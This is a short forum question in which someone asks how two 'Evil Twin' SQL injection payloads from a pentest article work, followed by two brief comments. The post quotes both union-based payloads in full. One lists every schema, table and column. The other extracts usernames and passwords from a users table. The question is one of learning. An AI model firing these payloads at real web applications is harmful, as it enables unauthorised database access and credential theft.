# How does the Evil Twin SQL injection query works?

Tags: sql-injection, databases, evil-twin

I have been reading about SQL injection and got hit at Evil Twin SQL injection [here](http://securityidiots.com/Web-Pentest/SQL-Injection/sql-evil-twin-injection.html). There are two queries mentioned in the article as follows.

```
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
```

and

```
-1' union all select (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
```

I understand the first query will fetch all the tables and corresponding columns and the second query will fetch data from a particular column of a table. But the article doesn't really explain how the query works.

Most of my Google search went straight to Evil Twin wifi cracking :(

Comment: Maybe google for "union based sql injection", because this is basically what this is. Not sure why the author had to give it a different name.

Comment: I understand the union based injection. I would like to know how this particular set of code works. :)